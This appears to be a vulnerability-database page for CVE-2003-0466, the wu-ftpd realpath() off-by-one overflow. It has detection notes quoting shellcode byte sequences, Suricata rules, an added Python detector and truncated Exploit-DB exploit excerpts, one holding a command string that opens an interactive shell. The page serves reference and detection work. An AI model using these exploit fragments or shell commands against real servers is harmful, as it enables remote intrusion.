CVE-2003-0466
Published 2003-08-27
Priority P3 (55) · critical 9.8 · CVSS 3.1
Exploit available · EPSS 78.11% (99.5th percentile)
Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| freebsd | freebsd | 4.0 – 5.0 | — |
| netbsd | netbsd | 1.5 – 1.6.1 | — |
| openbsd | openbsd | 2.0 – 3.3 | — |
| redhat | wu_ftpd | — | — |
| sun | solaris | — | — |
| wuftpd | wu-ftpd | 2.5.0 – 2.6.2 | — |
Detection & IOCs (extracted from sources)
- Detect FTP banner strings 'wu-2.6.0', 'wu-2.6.1', or 'wu-2.6.2' in the FTP 220 greeting: the exploit's own banner scanner checks for these exact strings to confirm a vulnerable target.
- Alert on FTP commands (STOR, RETR, APPE, DELE, MKD, RMD, STOU, RNTO) carrying path arguments at or exceeding MAXPATHLEN+1 (typically 1025 bytes on BSD/Linux), which is the trigger condition for the off-by-one overflow.
- Monitor for unexpected outbound TCP connections from the FTP server process to port 41254, which is the bind-shell port used by the FreeBSD-targeted shellcode payload.
- Detect the Linux exploit shellcode NOP sled + payload byte sequence starting with \x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80 in FTP command payloads (setuid/chroot-break/execve shellcode by Lam3rZ).
- Detect the BSD exploit shellcode byte sequence starting with \x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80 in FTP command payloads (Lam3rZ chroot() code rewritten for FreeBSD by venglin).
- Flag FTP sessions where a large number of MKD commands are issued in rapid succession with incrementally varying long directory names: this is the exploit's directory-creation loop used to stage the overflow path.
- Statically linked programs embedding their own realpath() copy are not fixed by patching the C library alone and require rebuilding against a patched libc.
- The vulnerability affects wu-ftpd versions 2.5.0 through 2.6.2; the exploit targets 2.6.0, 2.6.1, and 2.6.2 with platform-specific return addresses for RedHat Linux 6.x, FreeBSD 4.6.2-RELEASE, and OpenBSD 3.0.
- The exploit uses 0xff byte doubling in the attack buffer construction to avoid path-separator issues; IDS signatures must account for this encoding when matching shellcode in FTP command streams.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| Red Hat (vendor) | — | 9.8 | CRITICAL | — |
GHSA
GHSA-7c4w-gm97-vgqq (ghsa_unreviewed, 2022-05-03, severity HIGH): carries the same description as the NVD entry above.
Red Hat
"security flaw" (vendor_redhat, 2003-07-31, CVSS 9.8 CRITICAL): carries the same description as the NVD entry above.
Suricata
GPL FTP STOU overflow attempt (suricata, 2010-09-23; sid 2102390)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"GPL FTP STOU overflow attempt"; flow:established,to_server; content:"STOU"; nocase; isdataat:100,relative; pcre:"/^STOU\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:cve,2003-0466; classtype:attempted-admin; sid:2102390; rev:6; metadata:created_at 2010_09_23, cve CVE_2003_0466, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP RETR overflow attempt (suricata, 2010-09-23; sid 2102392)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"GPL FTP RETR overflow attempt"; flow:established,to_server; content:"RETR"; nocase; isdataat:100,relative; pcre:"/^RETR\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:cve,2003-0466; reference:cve,2004-0287; reference:cve,2004-0298; classtype:attempted-admin; sid:2102392; rev:9; metadata:created_at 2010_09_23, cve CVE_2003_0466, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP APPE overflow attempt (suricata, 2010-09-23; sid 2102391; tagged CVE-2000-0133 in the rule metadata, also references CVE-2003-0466)
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP APPE overflow attempt"; flow:established,to_server; content:"APPE"; nocase; isdataat:100,relative; pcre:"/^APPE\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:bugtraq,8542; reference:cve,2000-0133; reference:cve,2003-0466; classtype:attempted-admin; sid:2102391; rev:12; metadata:created_at 2010_09_23, cve CVE_2000_0133, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP RNTO overflow attempt (suricata, 2010-09-23; sid 2102389; tagged CVE-2000-0133 in the rule metadata, also references CVE-2003-0466)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"GPL FTP RNTO overflow attempt"; flow:established,to_server; content:"RNTO"; nocase; isdataat:100,relative; pcre:"/^RNTO\s[^\n]{100}/smi"; reference:bugtraq,8315; reference:cve,2000-0133; reference:cve,2001-1021; reference:cve,2003-0466; classtype:attempted-admin; sid:2102389; rev:9; metadata:created_at 2010_09_23, cve CVE_2000_0133, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
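The detection items above and the four Suricata rules key on the same observable: one of the eight path commands followed by an over-long argument. The following is an added example, not code from the page or from any of the listed sources; it applies both thresholds (the rules' 100-byte argument and the MAXPATHLEN+1 trigger length, assuming MAXPATHLEN is 1024 as the detection note states) to a constructed FTP control-channel capture and also counts the long-name MKD loop described above. Names such as classify_line, scan_session and SAMPLE_SESSION are mine.

```python
"""Added example (not from the page or any listed source): classify lines of a
captured FTP control channel for the CVE-2003-0466 trigger condition."""
import re

# The eight commands the CVE text names as reaching fb_realpath().
PATH_COMMANDS = (b"STOR", b"RETR", b"APPE", b"DELE", b"MKD", b"RMD", b"STOU", b"RNTO")
MAXPATHLEN = 1024        # BSD/Linux value assumed here; the trigger length is MAXPATHLEN+1
SURICATA_MIN_ARG = 100   # argument length the GPL FTP "overflow attempt" rules key on
VULN_BANNERS = (b"wu-2.6.0", b"wu-2.6.1", b"wu-2.6.2")
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})[ \t]+([^\r\n]*)")  # verb, whitespace, argument

def classify_line(line: bytes) -> str:
    """Return 'banner', 'trigger', 'suspicious' or 'ok' for one control-channel line.
    Raw argument length is a proxy: the server resolves cwd + argument, which a sensor
    cannot see, so 'trigger' means the argument alone already reaches the overflow length."""
    if line.startswith(b"220 ") and any(b in line for b in VULN_BANNERS):
        return "banner"
    m = _CMD_RE.match(line)
    if not m or m.group(1).upper() not in PATH_COMMANDS:  # case-insensitive like the rules
        return "ok"
    arg_len = len(m.group(2))
    if arg_len >= MAXPATHLEN + 1:
        return "trigger"
    if arg_len >= SURICATA_MIN_ARG:
        return "suspicious"
    return "ok"

def scan_session(data: bytes) -> dict:
    """Tally classifications over a whole session (CRLF or LF line endings)."""
    counts = {"banner": 0, "trigger": 0, "suspicious": 0, "ok": 0}
    for line in data.splitlines():
        counts[classify_line(line)] += 1
    return counts

def mkd_staging_count(data: bytes, min_len: int = SURICATA_MIN_ARG) -> int:
    """Count MKD commands with long names: the public exploit stages its overflow
    path with a loop of such MKDs, so a high count in one session is a staging signal."""
    return sum(1 for line in data.splitlines()
               if (m := _CMD_RE.match(line)) and m.group(1).upper() == b"MKD"
               and len(m.group(2)) >= min_len)

# Constructed sample session: vulnerable banner, normal traffic, one long MKD and
# one STOR whose argument alone is MAXPATHLEN+1 bytes.
SAMPLE_SESSION = (
    b"220 ftp.example.test FTP server (Version wu-2.6.2(1) Wed Jul 30 2003) ready.\r\n"
    b"USER anonymous\r\nPASS guest@\r\nCWD /pub\r\nRETR README\r\n"
    + b"MKD " + b"A" * 200 + b"\r\n"
    + b"STOR " + b"B" * (MAXPATHLEN + 1) + b"\r\n"
    + b"QUIT\r\n"
)
```

Feed it a decoded FTP control stream (for example the reassembled TCP payload of port 21 traffic); a 'trigger' or a high MKD staging count on a session that also produced a 'banner' hit deserves escalation, while 'suspicious' alone carries the same medium confidence the Suricata rules assign.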
Exploit-DB
WU-FTPD 2.6.2 - Remote Command Execution (exploitdb, 2003-08-11)
---
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz), .
**
** Update:
** [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** [v0.0.3] August 3, Brute-Force function addition.
** [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
** It will be applied well to most XxxxBSD.
** [v0.0.5] August 4, Remote scan & exploit test function addition.
** August 6, Cleaning.
**
*/
#define VERSION "v0.0.5"
#include
#include
#include
#include
#include
#include
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD
Exploit-DB
WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow (exploitdb, 2003-08-06)
---
// source: https://www.securityfocus.com/bid/8315/info
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has led to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack buffer overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
NOTE: Patching the C library alone may not remov
Exploit-DB
WU-FTPD 2.6.2 - Off-by-One Remote Command Execution (exploitdb, 2003-08-03)
---
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz)
**
** Brute-Force function added.
**
*/
#define VERSION "v0.0.3"
#include
#include
#include
#include
#include
#include
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
/* ftpd handshake */
#def
Exploit-DB
WU-FTPD 2.6.2 - 'realpath()' Off-by-One Buffer Overflow (exploitdb, 2003-08-02)
---
// source: https://www.securityfocus.com/bid/8315/info (same SecurityFocus description as the 2003-08-06 entry above)
Exploit-DB
FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow (exploitdb, 2003-07-31)
---
// source: https://www.securityfocus.com/bid/8315/info (same SecurityFocus description as the 2003-08-06 entry above)
References
- ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-011.txt.asc
- http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0065.html
- http://download.immunix.org/ImmunixOS/7+/Updates/errata/IMNX-2003-7+-019-01
- http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
- http://marc.info/?l=bugtraq&m=105967301604815&w=2
- http://marc.info/?l=bugtraq&m=106001410028809&w=2
- http://marc.info/?l=bugtraq&m=106001702232325&w=2
- http://marc.info/?l=bugtraq&m=106002488209129&w=2
- http://secunia.com/advisories/9423
- http://secunia.com/advisories/9446
- http://secunia.com/advisories/9447
- http://secunia.com/advisories/9535
- http://securitytracker.com/id?1007380
- http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001257.1-1
- http://www.debian.org/security/2003/dsa-357
- http://www.kb.cert.org/vuls/id/743092
- http://www.mandriva.com/security/advisories?name=MDKSA-2003:080
- http://www.novell.com/linux/security/advisories/2003_032_wuftpd.html
- http://www.osvdb.org/6602
- http://www.redhat.com/support/errata/RHSA-2003-245.html
- http://www.redhat.com/support/errata/RHSA-2003-246.html
- http://www.securityfocus.com/archive/1/424852/100/0/threaded
- http://www.securityfocus.com/archive/1/425061/100/0/threaded
- http://www.securityfocus.com/bid/8315
- http://www.turbolinux.com/security/TLSA-2003-46.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/12785
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1970